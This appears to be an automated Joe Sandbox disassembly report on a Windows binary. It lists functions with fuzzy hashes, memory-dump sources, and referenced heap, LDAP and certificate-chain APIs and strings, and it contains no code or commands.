Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9cbd260e13117f1f5e36382f2f0aff102ea4b683820d97de940a68ce141764bf
Instruction ID: bbd7d4ef26df004f73f0068e1f0594a67a51539ed571a8897718245c35f521a8
Opcode Fuzzy Hash: 9cbd260e13117f1f5e36382f2f0aff102ea4b683820d97de940a68ce141764bf
Instruction Fuzzy Hash: 39B1AD76908B458AE764AF2AC05022CBBE4FF49B4CFA441B9CA5D433E5CFB9D441C7A4

Function 00007FF7F1326AD0 Relevance: 1.4, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F1326B75

Part of subcall function 00007FF7F131DE2C: HeapAlloc.KERNEL32(?,?,00000000,00007FF7F131B22E,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131DE81

Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700

Part of subcall function 00007FF7F132A524: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F132A557

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
String ID:
API String ID: 916656526-0
Opcode ID: 610d6efb23af236bbb731a3c30169f1f48c4d23925bb60a0db3c7df5cd19ed7e
Instruction ID: 91bff3d1f78c58b7e3ca079bd559b319b2464b960ad2687d829eaeaaf5270fb5
Opcode Fuzzy Hash: 610d6efb23af236bbb731a3c30169f1f48c4d23925bb60a0db3c7df5cd19ed7e
Instruction Fuzzy Hash: 7141F961F092A343FB70BE2668516BAE290AF85B80F80517DDE6D577C5DFBCE40182E0

Function 00007FF7F1326144 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7F1326148

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 105c07a39436fc65c96653f7f0e22869ce95d6d0b8187ce922501a3ee5b46d73
Instruction ID: d926bfd1325d3c69ef1e3e4f588235190acb23d6800736db94208069001a506b
Opcode Fuzzy Hash: 105c07a39436fc65c96653f7f0e22869ce95d6d0b8187ce922501a3ee5b46d73
Instruction Fuzzy Hash: 58B09222E0BA06C3EB083B116CC261462A96F98710FD9003CC52C80360DFAC30E6A760

Function 00007FF7F12856A0 Relevance: .7, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 401934b12d4d57dff7fbecf44d87034bca62b97aeb0ca5ab5e190bc30e129afc
Instruction ID: e52ff48914c7622e33565e111cf6e2484928abe2d40a793da84e4ada2ece089d
Opcode Fuzzy Hash: 401934b12d4d57dff7fbecf44d87034bca62b97aeb0ca5ab5e190bc30e129afc
Instruction Fuzzy Hash: 1E628B76A086518BD7649F25C08052CB7B1F758F68F655236CE2DC3B89CB78E891CFA0

Function 00007FF7F1308594 Relevance: .3, Instructions: 327COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2e598bfd8f9db23d7f85586f9a9689e9849548091e68750002833d44ca696d9
Instruction ID: 3728ab03e56f21be35a407d24a5dfd21ff14e38bed30d376dbcbc7930d17e9dd
Opcode Fuzzy Hash: b2e598bfd8f9db23d7f85586f9a9689e9849548091e68750002833d44ca696d9
Instruction Fuzzy Hash: 83D1E822E0860687EB68AE2A845023EA7E0EF05B5CF95417DCF2D176D5CFBDD851C7A0

Function 00007FF7F1314A7C Relevance: .3, Instructions: 309COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
String ID:
API String ID: 4023145424-0
Opcode ID: e4724d110090267567c390dc0fc531ad2632116f96ee7341dd939fd0b1a1e8bf
Instruction ID: a0ca48c06a8e4e6d7c6c3fb4aef6b8925a6599399445952afc82b9715231d717
Opcode Fuzzy Hash: e4724d110090267567c390dc0fc531ad2632116f96ee7341dd939fd0b1a1e8bf
Instruction Fuzzy Hash: F6C1EA25E0868246EB60AB61D5103BAA7E0FFA4798FC24039DEADA76C5DFBCD501C350

Function 00007FF7F130DD78 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da34ac83b718cb28b224a2d2df496d0cb171177076e7f037eb7ed32ffbaa8632
Instruction ID: ede9ade67ed3b692edf225679a7960c3ab415ad8ab498b18f73b57eddfa21465
Opcode Fuzzy Hash: da34ac83b718cb28b224a2d2df496d0cb171177076e7f037eb7ed32ffbaa8632
Instruction Fuzzy Hash: 85915A26B1828647FB24AA2690103B9A7D0AF5179CF84113CDD7E477C5DFBCE809E7A0

Function 00007FF7F1286060 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ebbbd205f20f73f35923b307919996684a53ebed511ccb50f4f1b199549430b
Instruction ID: f90db754463a710c1f6a952f4c76b208f2b01656d0ac079df5a884fc92655865
Opcode Fuzzy Hash: 5ebbbd205f20f73f35923b307919996684a53ebed511ccb50f4f1b199549430b
Instruction Fuzzy Hash: F5A1563272416047D705D72A98688BA73E4FB98359F959136EF99C77C0CB3DE811CBA0

Function 00007FF7F128B874 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6d3b5c4de2afde0a3fd61332e5bcf755bdc5ebf2cbac364ee3388e725a938a6
Instruction ID: 32a8baf841d8789d15e67803221312eb4ef47c4cf39d239a00f0c9788c271fb3
Opcode Fuzzy Hash: a6d3b5c4de2afde0a3fd61332e5bcf755bdc5ebf2cbac364ee3388e725a938a6
Instruction Fuzzy Hash: B391D162B18A8582EB149E65D4405BCA360FB54BE0F84923ADE6EC7FC4EF7CE551C380

Function 00007FF7F131F19C Relevance: .2, Instructions: 198COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 493724b116f5e10b89b84bb2ec4a2a8898ca1882135cc21c34ad25bd87c358c2
Instruction ID: b092e8ec358a5ae6794fa9d5756ad7393033cc7d986611f7cfb046e0ec5f781b
Opcode Fuzzy Hash: 493724b116f5e10b89b84bb2ec4a2a8898ca1882135cc21c34ad25bd87c358c2
Instruction Fuzzy Hash: E9812572E0878147E778EB1994803BAB694FF4A7A4F854239DAAD53BC9CF7CD0058B50

Function 00007FF7F1311810 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: fab6f0e58bcffe6acf1ee0e26bd071f9deeffe126abb9c8078ac0c4272275751
Instruction ID: f4dae0427a669593e118d91a747de1d9bf7771b592af0b73b42fdd6292837e9c
Opcode Fuzzy Hash: fab6f0e58bcffe6acf1ee0e26bd071f9deeffe126abb9c8078ac0c4272275751
Instruction Fuzzy Hash: 2961E623E1829247FB64A93984507F9EAD1AF40770F96423DDA3E526C5DFEDE84087E0

Function 00007FF7F13072BC Relevance: .1, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
Instruction ID: ef63371e72c5b25c40d132f1cf3d55a65c8c25c6f3a82ec12f2629403c6bf484
Opcode Fuzzy Hash: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
Instruction Fuzzy Hash: 02519C72A18A5187E7259B29C041228A7E0EF44B5CFA88179CE9D177D5CBBAF843C7D0

Function 00007FF7F13074C0 Relevance: .1, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
Instruction ID: fd9105e3b9b9db1ddd089e63b447d95016ec46aef8e3d7846c6e4570f95699b9
Opcode Fuzzy Hash: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
Instruction Fuzzy Hash: 4251BF36A1869587E7249B29C040268B3E0EF45B6CFA44139CA9E177E4CB7AF843C7D0

Function 00007FF7F13076C4 Relevance: .1, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
Instruction ID: 639c91d22c3c45a5030a3580d21f9e0c62022863562dd9c286a48e1ecbb46459
Opcode Fuzzy Hash: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
Instruction Fuzzy Hash: F8516D36A1865187E7249B29C040238B7E0EF44F9CFA44139CADD57BD5CBBAF952C7A0

Function 00007FF7F1315DC4 Relevance: .1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4dc98e98a207682aab6e57f1db6fda77afefcc61d6e7491bdb94e614b2e4e211
Instruction ID: b703884841c812907287c33a992b639c18667044a33a23db98666ed1ed3668de
Opcode Fuzzy Hash: 4dc98e98a207682aab6e57f1db6fda77afefcc61d6e7491bdb94e614b2e4e211
Instruction Fuzzy Hash: A8411472B14A5482EF04DF2AD914569B3A1BB49FE0F8A903AEE5D97B98DF7CC4418340

Function 00007FF7F13107F8 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b2762244d102ac7151d761480d79947becfbf50fd42f5b2fcfaeb1150ef563
Instruction ID: cfe778ad99d4e32c50bd4b28e16a08855b4dedb37e148cfb25317c2c8da5d17b
Opcode Fuzzy Hash: f5b2762244d102ac7151d761480d79947becfbf50fd42f5b2fcfaeb1150ef563
Instruction Fuzzy Hash: 4331C632E1C10687F7B979298554279D942AF81360FE68039C83D229DDCFEBB44295F0

Function 00007FF7F132BED0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e975c92c03be1ccd1aeb7be79c864e6d829d1002b627bd40ad3551951638163
Instruction ID: 7d77ec1ac752ceeb763338b81e9c57b4ff74e87ba95e57aa887f5cad064af7fb
Opcode Fuzzy Hash: 0e975c92c03be1ccd1aeb7be79c864e6d829d1002b627bd40ad3551951638163
Instruction Fuzzy Hash: 80F06871B182AD8BDB989F28A812A297BD5FB08380F80803DD69D83B54D77D94608F54

Function 00007FF7F12F9EB0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9b57260f47f41705f30453434a158534e477cd275010c4e69d4d1281db591ae
Instruction ID: cc575ee717b6fdeae47399e2e14aa4c19fad89d354175f82af2866db5253f1f0
Opcode Fuzzy Hash: f9b57260f47f41705f30453434a158534e477cd275010c4e69d4d1281db591ae
Instruction Fuzzy Hash: 5BF08524324B6BBEFE01893B0620FAD5E419BC0700FE368758C90424CB8A9E54A3D720

Function 00007FF7F12F7650 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cde3abcfc0e7fade4db1bd8ce6c94d58eb432cbc668112a4365ac063567ee3ef
Instruction ID: b11c6db0f509ed83a9cd281989f6a579e7504fb82dd5af13f6e8edc12a4c2dd6
Opcode Fuzzy Hash: cde3abcfc0e7fade4db1bd8ce6c94d58eb432cbc668112a4365ac063567ee3ef
Instruction Fuzzy Hash: 0EA01122A0A80A80A3008B00E2A0E20A220FB88B28B808020880C028208E28A0028200

Function 00007FF7F12FACE8 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88103d8edafb4eabc91e576862a653e6326764067cad33c98d87f9ea2c693a30
Instruction ID: 29c4a30fce345ade8e84b8e628c7fdce9dc49f324af6e61e59c4538815d6b979
Opcode Fuzzy Hash: 88103d8edafb4eabc91e576862a653e6326764067cad33c98d87f9ea2c693a30
Instruction Fuzzy Hash: C4A00121A0890292E754AB44A891160A220EB54710F810035C83D815A49FBCB480E3A4

Function 00007FF7F12D38A0 Relevance: 75.7, APIs: 29, Strings: 14, Instructions: 463COMMON

Download Yara Rule

APIs

#22.WLDAP32 ref: 00007FF7F12D396F
#211.WLDAP32 ref: 00007FF7F12D3A0D
#217.WLDAP32 ref: 00007FF7F12D3A2D
#211.WLDAP32 ref: 00007FF7F12D3A48
#211.WLDAP32 ref: 00007FF7F12D3A5A
#211.WLDAP32 ref: 00007FF7F12D3A90
#22.WLDAP32 ref: 00007FF7F12D3AB4
#41.WLDAP32 ref: 00007FF7F12D3F66
#46.WLDAP32 ref: 00007FF7F12D3F9A

Strings

LDAP local: LDAP Vendor = %s ; LDAP Version = %d, xrefs: 00007FF7F12D38C9
Microsoft Corporation., xrefs: 00007FF7F12D38BD
;binary, xrefs: 00007FF7F12D3DA0
LDAP local: %s, xrefs: 00007FF7F12D390F
encrypted, xrefs: 00007FF7F12D39B3
There are more than %d entries, xrefs: 00007FF7F12D3F76
LDAP local: Cannot connect to %s:%u, xrefs: 00007FF7F12D3B2D
LDAP local: explicit TLS not supported, xrefs: 00007FF7F12D3AE7
LDAP local: bind via ldap_win_bind %s, xrefs: 00007FF7F12D3ABA
LDAP local: trying to establish %s connection, xrefs: 00007FF7F12D39A3
DN: , xrefs: 00007FF7F12D3C41
cleartext, xrefs: 00007FF7F12D399C
Bad LDAP URL: %s, xrefs: 00007FF7F12D3975
LDAP remote: %s, xrefs: 00007FF7F12D3BAE

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: #211$#217
String ID: ;binary$Bad LDAP URL: %s$DN: $LDAP local: %s$LDAP local: Cannot connect to %s:%u$LDAP local: LDAP Vendor = %s ; LDAP Version = %d$LDAP local: bind via ldap_win_bind %s$LDAP local: explicit TLS not supported$LDAP local: trying to establish %s connection$LDAP remote: %s$Microsoft Corporation.$There are more than %d entries$cleartext$encrypted
API String ID: 2221317745-3957863006
Opcode ID: afa5e0c8cbb36f7149ca9228e0a38e1da350dba756543175c963b5dbf3f28fba
Instruction ID: 3edf195141e2399f709e393627abaa33581b604ca8256d471c89ca4c17c66739
Opcode Fuzzy Hash: afa5e0c8cbb36f7149ca9228e0a38e1da350dba756543175c963b5dbf3f28fba
Instruction Fuzzy Hash: 3F12AD66B09B4686FB04EBA6D8502B9B7A0BF45B88F800035DD2D977D5DFBCE405D3A0

Function 00007FF7F12F1670 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 263encryptionCOMMON

Download Yara Rule

APIs

CertOpenStore.CRYPT32 ref: 00007FF7F12F179E
GetLastError.KERNEL32 ref: 00007FF7F12F17AC
CertCreateCertificateChainEngine.CRYPT32 ref: 00007FF7F12F1876
GetLastError.KERNEL32 ref: 00007FF7F12F1880

Part of subcall function 00007FF7F12C5BE0: GetLastError.KERNEL32 ref: 00007FF7F12C5C02

CertGetCertificateChain.CRYPT32 ref: 00007FF7F12F1909
